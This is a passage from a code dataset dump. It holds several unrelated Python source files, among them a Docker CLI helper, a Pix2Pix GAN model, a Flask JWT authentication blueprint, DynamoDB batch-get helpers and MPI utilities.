\"--location\", url] + auth_flags,\n print_command=False,\n stdout=subprocess.PIPE,\n encoding=\"utf-8\",\n )\n # stdout is a file-like object opened in text mode when the encoding\n # argument is \"utf-8\"\n stdout = cast(TextIO, result.stdout)\n version = stdout.readline().strip()\n\n return subdomain, auth_flags, version\n\n\ndef check_existing_version(install_path: Path) -> str:\n compose_path = install_path / \"docker-compose.yml\"\n compose = yaml.load(compose_path.read_text(), Loader=yaml.SafeLoader)\n version = compose[\"services\"][\"core\"][\"image\"].split(\":\")[-1]\n version = \"v\" + version\n return version\n\n\ndef _assert_has_docker_permissions() -> None:\n \"\"\"Fails if the user does not have permissions to interact with Docker\"\"\"\n if not (os_utils.is_root() or os_utils.currently_in_group(\"docker\")):\n error_message = (\n i18n.t(\"general.docker-bad-permissions\")\n + \"\\n\"\n + _group_recommendation_message(\"docker\")\n )\n\n print_utils.fail(error_message)\n\n\ndef _assert_has_write_permissions(path: Path) -> None:\n \"\"\"Fails if the user does not have write access to the given path.\"\"\"\n if os.access(path, os.W_OK):\n return\n\n error_message = i18n.t(\"general.file-bad-write-permissions\", path=path)\n error_message += \"\\n\"\n\n if path.stat().st_gid == os_utils.BRAINFRAME_GROUP_ID:\n error_message += \" \" + _group_recommendation_message(\"brainframe\")\n else:\n error_message += \" \" + i18n.t(\n \"general.unexpected-group-for-file\", path=path, group=\"brainframe\"\n )\n\n print_utils.fail(error_message)\n\n\ndef _group_recommendation_message(group: str) -> str:\n if os_utils.added_to_group(\"brainframe\"):\n # The user is in the group, they just need to restart\n return i18n.t(\"general.restart-for-group-access\", group=group)\n else:\n # The user is not in the group, so they need to either add\n # themselves or use sudo\n return i18n.t(\"general.retry-as-root-or-group\", group=group)\n","sub_path":"brainframe/cli/docker_compose.py","file_name":"docker_compose.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"466955232","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom Perceptron import Perceptron\n\ndata = np.genfromtxt('sonar.all-data.txt', delimiter=',')\nnp.random.shuffle(data)\n\ninputs = data[:, 0:60]\ntargets = data[:, 60]\n\nn_inputs = 60\np1 = Perceptron(n_inputs)\nalfa = 0.005\n\nN = 200\nE = np.zeros(N)\nfor i in range(N):\n p1.error_train_epoch(inputs, targets, alfa)\n E[i] = p1.error_value(inputs, targets)\n print(E[i])\n\nplt.plot(E)\nplt.ylabel('E')\nplt.xlabel('epochy')\nplt.show()\n","sub_path":"main2.py","file_name":"main2.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"132795888","text":"import acm\nfrom DealDevKit import DealDefinition, Settings, NoOverride\nfrom CompositeAttributesLib import CashFlowInstrumentDefinition, InstrumentPropertiesDefinition, InstrumentIDDefinition, LegDefinition, CashFlowDefinition, TradeDefinition, TradeBODefinition, AddInfoDefinition, InstrumentRegulatoryInfoDefinition, TradeIDDefinition, TradeRegulatoryInfoDefinition\nfrom DealSTI import DealSTI\n \n@DealSTI('TotalReturnSwap') \n@Settings(SheetDefaultColumns=['Multi Leg Label', 'Portfolio Present Value', 'Fixed Rate', 'Par Rate', 'Float Spread', 'Par Spread', 'Portfolio Delta Yield']) \nclass TotalReturnSwapDefinition(DealDefinition):\n\n ins = CashFlowInstrumentDefinition( instrument=\"Instrument\" )\n \n insProperties = InstrumentPropertiesDefinition( instrument=\"Instrument\" )\n \n insID = InstrumentIDDefinition( instrument=\"Instrument\")\n\n tradeID = TradeIDDefinition( trade=\"Trade\")\n\n insRegulatoryInfo = InstrumentRegulatoryInfoDefinition(insRegInfo=\"InstrumentRegulatoryInfo\")\n\n payLeg = LegDefinition( leg='PayLeg', trade='Trade' )\n \n recLeg = LegDefinition( leg='ReceiveLeg', trade='Trade' )\n \n payCashFlows = CashFlowDefinition( leg='PayLeg', trade='Trade')\n \n recCashFlows = CashFlowDefinition( leg='ReceiveLeg', trade='Trade')\n \n trade = TradeDefinition( trade='Trade', showBuySell=False )\n \n tradeBackOffice = TradeBODefinition ( trade='Trade' )\n \n insAddInfo = AddInfoDefinition( obj='Instrument' )\n \n tradeAddInfo = AddInfoDefinition( obj='Trade' )\n \n tradeRegulatoryInfo = TradeRegulatoryInfoDefinition(tradeRegInfo=\"TradeRegulatoryInfo\")\n\n # Attribute overrides\n def AttributeOverrides(self, overrideAccumulator):\n overrideAccumulator(\n {\n 'ins_currency': dict(onChanged='@OnInstrumentCurrencyChanged'),\n 'ins_discountingType': dict(visible='@DiscountingTypeVisible'),\n 'ins_dividendFactor': dict(label='Div Factor',\n visible='@DividendFactorVisible'),\n 'ins_quotation': dict(onChanged='@OnQuotationChanged',\n visible='@IsShowModeInstrumentDetail'),\n 'ins_settlementType': dict(label='Settlement'),\n 'insProperties_spotBankingDaysOffset': dict(onChanged='@OnInstrumentSpotDaysChanged'),\n 'payLeg_calculationPeriodDateRule': dict(visible='@RollOffsetVisible'),\n 'payLeg_currency': dict(label='',\n width=9),\n 'payLeg_dayCountMethod': dict(visible='@DayCountVisible'),\n 'payLeg_initialRate': dict(label='Initial Price',\n visible='@InitialPriceVisible',\n maxWidth=500),\n 'recLeg_calculationPeriodDateRule': dict(visible='@RollOffsetVisible'),\n 'recLeg_currency': dict(label='',\n width=9),\n 'recLeg_dayCountMethod': dict(visible='@DayCountVisible'),\n 'recLeg_initialRate': dict(label='Initial Price',\n visible='@InitialPriceVisible',\n maxWidth=500),\n 'recLeg_priceInterpretationType': dict(visible='@PriceInterpretationTypeVisible'),\n 'trade_premium': dict(visible=True),\n 'trade_price': dict(visible=True),\n 'trade_salesCoverViceVersaPrice': dict(visible=False),\n 'trade_suggestDiscountingType': dict(visible='@DiscountingTypeVisible'),\n }\n ) \n\n # Visible Callbacks\n def DiscountingTypeVisible(self, attributeName):\n return self.IsShowModeDetail() or self.Instrument().DiscountingType()\n \n def DayCountVisible(self, attributeName):\n if attributeName == 'payLeg_dayCountMethod':\n return self.IsShowModeDetail() or self.PayLeg().LegType() != 'Total Return'\n if attributeName == 'recLeg_dayCountMethod':\n return self.IsShowModeDetail() or self.ReceiveLeg().LegType() != 'Total Return'\n \n def DividendFactorVisible(self, attributeName):\n for leg in self.Instrument().Legs():\n if leg.LegType()=='Total Return' and leg.FloatRateReference():\n if leg.FloatRateReference().InsType() != 'Bond':\n return self.IsShowModeDetail()\n return False\n\n def InitialPriceVisible(self, attributeName):\n if attributeName == 'payLeg_initialRate':\n return self.PayLeg().LegType() == 'Total Return'\n if attributeName == 'recLeg_initialRate':\n return self.ReceiveLeg().LegType() == 'Total Return'\n \n def PriceInterpretationTypeVisible(self, attributeName):\n for leg in self.Instrument().Legs():\n if leg.LegType()=='Total Return' and leg.FloatRateReference():\n if leg.FloatRateReference().InsType() not in ['Stock', 'EquityIndex']:\n return self.IsShowModeDetail()\n return False\n \n def RollOffsetVisible(self, attributeName):\n if attributeName == 'payLeg_calculationPeriodDateRule':\n if self.PayLeg().LegType() != 'Total Return' and self.ReceiveLeg().LegType() == 'Total Return':\n return NoOverride\n if attributeName == 'recLeg_calculationPeriodDateRule':\n if self.ReceiveLeg().LegType() != 'Total Return' and self.PayLeg().LegType() == 'Total Return':\n return NoOverride\n \n \n # Util\n def InstrumentPanes(self):\n return 'CustomPanes_TotalReturnSwap'\n \n def TradePanes(self):\n return 'CustomPanes_TotalReturnSwapTrade'\n \n \ndef UpdateDefaultInstrument(ins):\n insDeco = acm.FBusinessLogicDecorator.WrapObject(ins)\n insDeco.UpdateLegFixedRateOrSpread()\n","sub_path":"Extensions/Deal Definitions/FPythonCode/TotalReturnSwap_DP.py","file_name":"TotalReturnSwap_DP.py","file_ext":"py","file_size_in_byte":6245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"12414271","text":"from typing import OrderedDict\nimport torch\nfrom torch.nn.modules.batchnorm import BatchNorm2d\nimport torch.nn as nn\nimport torch.optim as optim\nimport os\nimport torch.onnx\nimport functools\n\n\n# Pix2Pix model class [256 based]\nclass Pix2PixModel():\n def __init__(self, ckpt_dir, model_name,\n is_train=True, n_epochs=100, \n n_epochs_decay=100):\n super(Pix2PixModel, self).__init__()\n self.isTrain = is_train\n # self.training = self.isTrain\n self.save_dir = ckpt_dir\n self.loss_names = ['G_GAN', 'G_L1', 'D_real', 'D_fake']\n self.visual_names = ['real_A', 'fake_B', 'real_B']\n if self.isTrain:\n self.model_names = ['G', 'D']\n else:\n self.model_names = ['G']\n self.optimizers = []\n self.epoch_count = 1\n self.n_epochs = n_epochs\n self.n_epochs_decay = n_epochs_decay\n \n self.device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n\n norm_layer = functools.partial(nn.BatchNorm2d, affine=True, track_running_stats=True)\n # Define the Generator\n self.netG = Generator(3, 3, 8, ngf=64, norm_layer=norm_layer, use_dropout=False)\n self.netG = init_net(self.netG)\n\n # Define the Discriminator if training\n if self.isTrain:\n self.criterionLoss = nn.L1Loss()\n #self.netD = Discriminator(6, ndf=64, n_layers=3, norm_layer=norm_layer)\n self.netD = Discriminator(6)\n self.netD = init_net(self.netD)\n \n if self.isTrain:\n self.criterionGAN = GANLoss().to(self.device)\n self.criterionL1 = nn.L1Loss()\n self.optimizer_G = optim.Adam(self.netG.parameters(), lr=0.0002, betas=(0.5, 0.999))\n self.optimizer_D = optim.Adam(self.netD.parameters(), lr=0.0002, betas=(0.5, 0.999))\n self.optimizers.append(self.optimizer_G)\n self.optimizers.append(self.optimizer_D)\n \n def set_input(self, input):\n self.real_A = input['A'].to(self.device)\n self.real_B = input['B'].to(self.device)\n self.image_paths = input['A_paths']\n \n def forward(self):\n self.fake_B = self.netG(self.real_A)\n \n def backward_D(self):\n fake_AB = torch.cat((self.real_A, self.fake_B), 1)\n pred_fake = self.netD(fake_AB.detach())\n self.loss_D_fake = self.criterionGAN(pred_fake, False)\n \n real_AB = torch.cat((self.real_A, self.real_B), 1)\n pred_real = self.netD(real_AB)\n self.loss_D_real = self.criterionGAN(pred_real, True)\n\n self.loss_D = (self.loss_D_fake + self.loss_D_real) * 0.5\n self.loss_D.backward()\n \n def backward_G(self):\n fake_AB = torch.cat((self.real_A, self.fake_B), 1)\n pred_fake = self.netD(fake_AB)\n self.loss_G_GAN = self.criterionGAN(pred_fake, True)\n\n self.loss_G_L1 = self.criterionL1(self.fake_B, self.real_B) * 100.0\n\n self.loss_G = self.loss_G_GAN + self.loss_G_L1\n self.loss_G.backward()\n \n def set_requires_grad(self, nets, requires_grad=False):\n if not isinstance(nets, list):\n nets = [nets]\n for net in nets:\n if net is not None:\n for param in net.parameters():\n param.requires_grad = requires_grad\n\n def optimize_parameters(self):\n self.forward()\n\n self.set_requires_grad(self.netD, True)\n self.optimizer_D.zero_grad()\n self.backward_D()\n self.optimizer_D.step()\n\n self.set_requires_grad(self.netD, False)\n self.optimizer_G.zero_grad()\n self.backward_G()\n self.optimizer_G.step()\n \n def get_scheduler(self, optimizer):\n def lambda_rule(epoch):\n lr_l = 1.0 - max(0, epoch + self.epoch_count - self.n_epochs) / float(self.n_epochs_decay + 1)\n return lr_l\n scheduler = optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda_rule)\n return scheduler\n\n def setup(self):\n if self.isTrain:\n self.schedulers = [self.get_scheduler(optimizer) for optimizer in self.optimizers]\n \n self.print_networks()\n \n def eval(self):\n for name in self.model_names:\n if isinstance(name, str):\n net = getattr(self, 'net' + name)\n net.eval()\n\n def test(self):\n with torch.no_grad():\n self.forward()\n\n def get_image_paths(self):\n return self.image_paths\n\n def update_learning_rate(self):\n for scheduler in self.schedulers:\n scheduler.step()\n\n def get_current_visuals(self):\n visual_ret = OrderedDict()\n for name in self.visual_names:\n if isinstance(name, str):\n visual_ret[name] = getattr(self, name)\n return visual_ret\n\n def get_current_losses(self):\n errors_ret = OrderedDict()\n for name in self.loss_names:\n if isinstance(name, str):\n errors_ret[name] = float(getattr(self, 'loss_' + name))\n return errors_ret\n\n def save_network(self, epoch):\n for name in self.model_names:\n if isinstance(name, str):\n save_filename = '%s_net_%s.pth' % (epoch, name)\n save_path = os.path.join(self.save_dir, save_filename)\n net = getattr(self, 'net' + name)\n\n torch.save(net.cpu().state_dict(), save_path)\n net.to(self.device)\n \n def __patch_instance_norm_state_dict(self, state_dict, module, keys, i=0):\n key = keys[i]\n if i + 1 == len(keys):\n if module.__class__.__name__.startswith('InstanceNorm') and \\\n (key == 'running_mean' or key == 'running_var'):\n if getattr(module, key) is None:\n state_dict.pop('.'.join(keys))\n \n if module.__class__.__name__.startswith('InstanceNorm') and \\\n (key == 'running_mean' or key == 'running_var'):\n state_dict.pop('.'.join(keys))\n else:\n self.__patch_instance_norm_state_dict(state_dict, getattr(module, key), keys, i + 1)\n\n def load_networks(self, epoch):\n for name in self.model_names:\n if isinstance(name, str):\n load_filename = '%s_net_%s.pth' % (epoch, name)\n load_path = os.path.join(self.save_dir, load_filename)\n net = getattr(self, 'net' + name)\n if isinstance(net, nn.DataParallel):\n net = net.module\n print('Loading the model from %s' % load_path)\n\n state_dict = torch.load(load_path, map_location=str(self.device))\n if hasattr(state_dict, '_metadata'):\n del state_dict._metadata\n \n for key in list(state_dict.keys()):\n self.__patch_instance_norm_state_dict(state_dict, net, key.split('.'))\n net.load_state_dict(state_dict)\n\n def print_networks(self):\n print('---------- Networks initialized -------------')\n for name in self.model_names:\n if isinstance(name, str):\n net = getattr(self, 'net' + name)\n num_params = 0\n for param in net.parameters():\n num_params += param.numel()\n print('[Network %s] Total number of parameters : %.3f M' % (name, num_params / 1e6))\n \n # def train(self, is_training):\n # pass\n \nclass UnetBlock(nn.Module):\n def __init__(self, outer_nc, inner_nc, input_nc=None,\n submodule=None, outermost=False, innermost=False,\n norm_layer=nn.BatchNorm2d, use_dropout=False):\n super(UnetBlock, self).__init__()\n self.outermost = outermost\n if type(norm_layer) == functools.partial:\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n if input_nc is None:\n input_nc = outer_nc\n \n downconv = nn.Conv2d(input_nc, inner_nc, kernel_size=4,\n stride=2, padding=1, bias=use_bias)\n downrelu = nn.LeakyReLU(0.2, True)\n downnorm = norm_layer(inner_nc)\n\n uprelu = nn.ReLU(True)\n upnorm = norm_layer(outer_nc)\n\n if outermost:\n upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,\n kernel_size=4, stride=2,\n padding=1)\n \n down = [downconv]\n up = [uprelu, upconv, nn.Tanh()]\n model = down + [submodule] + up\n \n elif innermost:\n upconv = nn.ConvTranspose2d(inner_nc, outer_nc, kernel_size=4,\n stride=2, padding=1, bias=use_bias)\n \n down = [downrelu, downconv]\n up = [uprelu, upconv, upnorm]\n model = down + up\n \n else:\n upconv = nn.ConvTranspose2d(inner_nc * 2, outer_nc,\n kernel_size=4, stride=2,\n padding=1, bias=use_bias)\n\n down = [downrelu, downconv, downnorm]\n up = [uprelu, upconv, upnorm]\n \n if use_dropout:\n model = down + [submodule] + up + [nn.Dropout(0.5)]\n else:\n model = down + [submodule] + up\n \n self.model = nn.Sequential(*model)\n \n def forward(self, x):\n if self.outermost:\n return self.model(x)\n else:\n return torch.cat([x, self.model(x)], 1)\n\nclass Generator(nn.Module):\n def __init__(self, input_nc, output_nc, num_downs, ngf=64,\n norm_layer=nn.BatchNorm2d, use_dropout=False):\n super(Generator, self).__init__()\n unet_block = UnetBlock(ngf * 8, ngf * 8, input_nc=None,\n submodule=None, norm_layer=norm_layer,\n innermost=True)\n \n for i in range(num_downs - 5):\n unet_block = UnetBlock(ngf * 8, ngf * 8, input_nc=None, \n submodule=unet_block, norm_layer=norm_layer,\n use_dropout=use_dropout)\n \n unet_block = UnetBlock(ngf * 4, ngf * 8, input_nc=None,\n submodule=unet_block, norm_layer=norm_layer)\n \n unet_block = UnetBlock(ngf * 2, ngf * 4, input_nc=None,\n submodule=unet_block, norm_layer=norm_layer)\n \n unet_block = UnetBlock(ngf, ngf * 2, input_nc=None,\n submodule=unet_block, norm_layer=norm_layer)\n\n self.model = UnetBlock(output_nc, ngf, input_nc=input_nc, \n submodule=unet_block, \n outermost=True, norm_layer=norm_layer)\n \n\n def forward(self, input):\n return self.model(input)\n\nclass Discriminator(nn.Module):\n def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d):\n super(Discriminator, self).__init__()\n if type(norm_layer) == functools.partial:\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n \n kw = 4\n padw = 1\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), \n nn.LeakyReLU(0.2, True)]\n \n nf_mult = 1\n nf_mult_prev = 1\n \n for n in range(1, n_layers):\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n\n sequence += [nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult,\n kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8) # type: ignore\n\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1,\n padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)]\n self.model = nn.Sequential(*sequence)\n \n def forward(self, input):\n return self.model(input)\n\nclass GANLoss(nn.Module):\n def __init__(self, target_real_label=1.0, target_fake_label=0.0):\n super(GANLoss, self).__init__()\n self.register_buffer('real_label', torch.tensor(target_real_label))\n self.register_buffer('fake_label', torch.tensor(target_fake_label))\n\n self.gan_mode = 'vanilla'\n self.loss = nn.BCEWithLogitsLoss()\n \n def get_target_tensor(self, prediction, target_is_real):\n if target_is_real:\n target_tensor = self.real_label\n else:\n target_tensor = self.fake_label\n return target_tensor.expand_as(prediction)\n \n def __call__(self, prediction, target_is_real):\n target_tensor = self.get_target_tensor(prediction, target_is_real)\n loss = self.loss(prediction, target_tensor)\n\n return loss\n\ndef init_net(net):\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\n net.to(device)\n\n def init_weights(m):\n classname = m.__class__.__name__\n if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):\n nn.init.normal_(m.weight.data, 0.0, 0.02)\n if hasattr(m, 'bias') and m.bias is not None:\n nn.init.constant_(m.bias.data, 0.0)\n\n elif classname.find('BatchNorm2d') != -1:\n nn.init.normal_(m.weight.data, 1.0, 0.02)\n nn.init.constant_(m.bias.data, 0.0)\n \n net.apply(init_weights)\n return net\n","sub_path":"Pix2Pix_Project/pix2pix_helpers/pix2pix_model.py","file_name":"pix2pix_model.py","file_ext":"py","file_size_in_byte":14029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"440974174","text":"from datetime import datetime\nfrom datetime import timedelta\nfrom email_validator import validate_email\nfrom email_validator import EmailNotValidError\nfrom flask import current_app as app\nfrom flask import request\nfrom flask import Blueprint\n#\nfrom social_network import db\nfrom social_network.security import hash_password\nfrom social_network.security import compare_passwords\nfrom social_network.security import generate_jwt\nfrom social_network.security import parse_user_agent\nfrom social_network.security import generate_refresh_token\nfrom social_network.security import jwt_auth\nfrom social_network.other import record_activity\nfrom social_network.errors import ApplicationError\nfrom social_network.domain_models import User\nfrom social_network.domain_models import UserProfile\nfrom social_network.domain_models import RefreshToken\n\nfrom .payload_models import UserSignupPayload\nfrom .payload_models import UserSigninPayload\nfrom .payload_models import RefreshTokenPayload\n\n\napi = Blueprint(\"auth\", __name__)\n\n\n@api.route(\"/api/email-lookup\", methods=[\"GET\"])\n@record_activity()\ndef email_lookup(*args, **kwargs):\n try:\n user_email = validate_email(request.args[\"email\"]).email\n except EmailNotValidError:\n return {\"value\": False}\n\n user = (\n db.session.query(User)\n .filter(User.email==user_email)\n .filter(User.deleted_at.is_(None))\n .first()\n )\n\n return (\n {\"status\": \"ok\", \"value\": False}\n if user is None else\n {\"status\": \"ok\", \"value\": True}\n )\n\n\n@api.route(\"/api/signup\", methods=[\"POST\"])\n@record_activity()\ndef signup(*args, **kwargs):\n now = datetime.now()\n user_payload = UserSignupPayload(**request.get_json())\n\n # === does the user with the received email exist ===\n\n existing_user = (\n db.session.query(User)\n .filter(User.email==user_payload.email)\n .filter(User.deleted_at.is_(None))\n .first()\n )\n\n if existing_user is not None:\n raise ApplicationError(\n f\"User with email - {user_payload.email} - already exist!\",\n code=400\n )\n\n # === hashing password and creating new user ===\n\n hashed_passw = hash_password(user_payload.password.get_secret_value())\n\n new_user = User(\n email=user_payload.email,\n password=hashed_passw,\n created_at=now\n )\n new_user.profile = UserProfile(\n first_name = user_payload.first_name,\n last_name = user_payload.last_name,\n full_name = f\"{user_payload.first_name} {user_payload.last_name}\",\n sex = user_payload.sex,\n country = user_payload.country,\n city = user_payload.city,\n birthday = user_payload.birthday,\n phone = user_payload.phone,\n created_at = now\n )\n\n db.session.add(new_user)\n db.session.commit()\n\n return {\"status\": \"ok\", \"value\": new_user.id}\n\n\n@api.route(\"/api/signin\", methods=[\"POST\"])\n@record_activity()\ndef signin(*args, **kwargs):\n ua_header = request.headers.get(\"User-Agent\", \"\")\n user_agent = parse_user_agent(ua_header)\n\n signin_payload = UserSigninPayload(**request.get_json())\n\n # === does the user with the received email exist ===\n\n user = (\n db.session.query(User)\n .filter(User.email==signin_payload.email)\n .filter(User.deleted_at.is_(None))\n .first()\n )\n \n if user is None:\n raise ApplicationError(\n f\"Access denied. User with email - {signin_payload.email} - does not exist!\",\n code=403\n )\n\n # === \n\n if compare_passwords(signin_payload.password.get_secret_value(), user.password):\n\n # the password is correct; generating jwt and refresh tokens\n \n now = datetime.now()\n jwt_token_ttl = app.config[\"JWT_TOKEN_POLICY\"][\"TOKEN_EXPIRES_IN\"]\n refresh_token_ttl = app.config[\"JWT_TOKEN_POLICY\"][\"REFRESH_TOKEN_EXPIRES_IN\"]\n jwt_token_expires_at = now + timedelta(seconds=jwt_token_ttl)\n refresh_token_expires_at = now + timedelta(seconds=refresh_token_ttl)\n\n refresh_token = RefreshToken(\n token=generate_refresh_token(),\n exp=refresh_token_expires_at,\n os=user_agent[\"os\"],\n device=user_agent[\"device\"],\n browser=user_agent[\"browser\"],\n created_at=now\n )\n\n db.session.add(refresh_token)\n db.session.commit()\n\n jwt_payload = {\n \"usrid\": user.id,\n \"usrrole\": user.security_role,\n \"exp\": jwt_token_expires_at,\n **user_agent\n }\n jwt_token = generate_jwt(\n jwt_payload,\n app.config[\"JWT_TOKEN_POLICY\"]\n )\n\n return {\n \"token\": jwt_token,\n \"refresh_token\": refresh_token.token,\n \"expires_at\": int(jwt_token_expires_at.timestamp() * 1000),\n \"refresh_token_expires_at\": int(refresh_token_expires_at.timestamp() * 1000)\n }, 200\n\n else:\n raise ApplicationError(\n \"Access denied. Inccorrect password\",\n code=403\n )\n\n\n@api.route(\"/api/refresh-token\", methods=[\"POST\"])\n@jwt_auth(can_be_expired=True)\n@record_activity()\ndef refresh_jwt_token(*args, **kwargs):\n now = datetime.now()\n\n user = kwargs[\"user\"] # from the jwt_auth decorator\n user_agent = kwargs[\"user_agent\"] # from the jwt_auth decorator\n token_payload = RefreshTokenPayload(**request.get_json())\n\n # === does the refresh token exist in db ===\n\n refresh_token = (\n db.session.query(RefreshToken)\n .filter(RefreshToken.token == token_payload.refresh_token.get_secret_value())\n .filter(RefreshToken.deleted_at.is_(None))\n .first()\n )\n\n if refresh_token is None:\n raise ApplicationError(\"Invalid refresh token\", code=403)\n\n # === is the refresh token expired ===\n\n if refresh_token.exp < now:\n refresh_token.deleted_at = now\n db.session.commit()\n raise ApplicationError(\"Refresh token expired\", code=403)\n\n # === generating new jwt token ===\n\n jwt_token_ttl = app.config[\"JWT_TOKEN_POLICY\"][\"TOKEN_EXPIRES_IN\"]\n jwt_token_expires_at = now + timedelta(seconds=jwt_token_ttl)\n\n jwt_payload = {\n \"usrid\": user.id,\n \"usrrole\": user.security_role,\n \"exp\": jwt_token_expires_at,\n **user_agent\n }\n jwt_token = generate_jwt(\n jwt_payload,\n app.config[\"JWT_TOKEN_POLICY\"]\n )\n\n return {\n \"token\": jwt_token,\n \"expires_at\": int(jwt_token_expires_at.timestamp() * 1000),\n }, 200\n","sub_path":"src/social_network/blueprints/auth/auth.py","file_name":"auth.py","file_ext":"py","file_size_in_byte":6566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"645960737","text":"#__author__ = 'lizhifeng'\n#coding=utf-8\n\nfrom aws4_signature import GetDynamodbClient\n# from utility import binary2string\n\n\ndef batch_get(client, pid_pn, table_name, table_range_name=\"\", table_key_name=\"patent_id\",\n fields_type=None, table_range=\"\", batch=10):\n _request = {table_name: {}}\n _request[table_name][\"Keys\"] = []\n if len(fields_type) != 0:\n project_expression = \",\".join(fields_type)\n _request[table_name][\"ProjectionExpression\"] = project_expression\n\n rlt = []\n\n i = 0\n count = 0\n patent_num = len(pid_pn)\n patent_ids = pid_pn.keys()\n for patent_id in patent_ids:\n\n key_dict = {table_key_name: {}}\n key_dict[table_key_name][\"S\"] = patent_id\n\n _request[table_name][\"Keys\"].append(key_dict)\n if table_range != \"\":\n _request[table_name][\"Keys\"][i][\"lang\"] = {\"S\": range}\n\n i += 1\n count += 1\n\n if i == batch or count == patent_num:\n\n # print _request\n _response = client.batch_get_item(RequestItems=_request)\n rlt.append(_response)\n\n # parse_batch_get(_response, rlt, table_name, table_range_name, table_key_name, fields_type)\n\n i = 0\n _request[table_name][\"Keys\"] = []\n\n return rlt\n\n\ndef parse_batch_get(response, rlt, table_name, table_range_name=\"\", table_key=\"patent_id\", field_type_dict=\"\"):\n\n _fields = field_type_dict.keys()\n for item in response[\"Responses\"][table_name]:\n\n _key = item[table_key][\"S\"]\n if table_range_name != \"\":\n _range = item[table_range_name][\"S\"]\n _key += _range\n\n for _field in _fields:\n _type = field_type_dict[_field]\n _content = item[_field][_type]\n rlt[_field][_key] = _content\n\n","sub_path":"collection/ml/landscape/dynamodb_api.py","file_name":"dynamodb_api.py","file_ext":"py","file_size_in_byte":1796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"460937427","text":"from functools import reduce\n\nwhile True:\n unique = None\n non_unique = None\n p = ''\n p2 = ''\n\n my_list1 = input()\n if my_list1 == 'stop playing':\n break\n my_list = list(map(int, my_list1.split()))\n\n if len(my_list) > len(set(my_list)):\n non_unique = my_list\n for a in range(0, len(non_unique)):\n if non_unique[a] % 2 != 0:\n non_unique[a] += 3\n non_unique.sort()\n for n in non_unique:\n p += str(n)\n p += ':'\n p1 = p[:-1]\n print(f'Non-unique list: {p1}')\n sum = reduce(lambda x, y: x + y, non_unique)\n sum1 = sum / len(non_unique)\n print(f'Output: {sum1:.2f}')\n else:\n unique = my_list\n for b in range(0, len(unique)):\n if unique[b] % 2 == 0:\n unique[b] += 2\n unique.sort()\n for n in unique:\n p2 += str(n)\n p2 += ','\n p3 = p2[:-1]\n print(f'Unique list: {p3}')\n sum3 = reduce(lambda x, y: x + y, unique)\n sum4 = sum3 / len(unique)\n print(f'Output: {sum4:.2f}')\n\n\n\n\n\n\n\n","sub_path":"PythonFundamentals/Exam_Prep_2/Lists.py","file_name":"Lists.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"358925703","text":"\"\"\"\nAuxillary functions and variables for dealing with MPI multiprocessing\n\nWarning:\n These functions are mostly no-ops unless MPI is properly installed and python code\n was started using :code:`mpirun` or :code:`mpiexec`. Please refer to the\n documentation of your MPI distribution for details.\n\n.. autosummary::\n :nosignatures:\n\n mpi_send\n mpi_recv\n mpi_allreduce\n\n.. codeauthor:: David Zwicker \n\"\"\"\n\nimport os\nimport sys\nfrom numbers import Number\nfrom typing import TYPE_CHECKING, Union\n\nimport numpy as np\nfrom numba.core import types\nfrom numba.extending import overload, register_jitable\n\nfrom .numba import jit\n\nif TYPE_CHECKING:\n from numba_mpi import Operator # @UnusedImport\n\n# Initialize assuming that we run serial code if `numba_mpi` is not available\ninitialized: bool = False\n\"\"\"bool: Flag determining whether mpi was initialized (and is available)\"\"\"\n\nsize: int = 1\n\"\"\"int: Total process count\"\"\"\n\nrank: int = 0\n\"\"\"int: ID of the current process\"\"\"\n\n# read state of the current MPI node\ntry:\n import numba_mpi\n\nexcept ImportError:\n # package `numba_mpi` could not be loaded\n if int(os.environ.get(\"PMI_SIZE\", \"1\")) > 1:\n # environment variable indicates that we are in a parallel program\n sys.exit(\n \"WARNING: Detected multiprocessing run, but could not import python \"\n \"package `numba_mpi`\"\n )\n\nelse:\n # we have access to MPI\n initialized = numba_mpi.initialized()\n size = numba_mpi.size()\n rank = numba_mpi.rank()\n\nparallel_run: bool = size > 1\n\"\"\"bool: Flag indicating whether the current run is using multiprocessing\"\"\"\n\nis_main: bool = rank == 0\n\"\"\"bool: Flag indicating whether the current process is the main process (with ID 0)\"\"\"\n\n\n@jit\ndef mpi_send(data, dest: int, tag: int) -> None:\n \"\"\"send data to another MPI node\n\n Args:\n data: The data being send\n dest (int): The ID of the receiving node\n tag (int): A numeric tag identifying the message\n \"\"\"\n status = numba_mpi.send(data, dest, tag)\n assert status == 0\n\n\n@jit()\ndef mpi_recv(data, 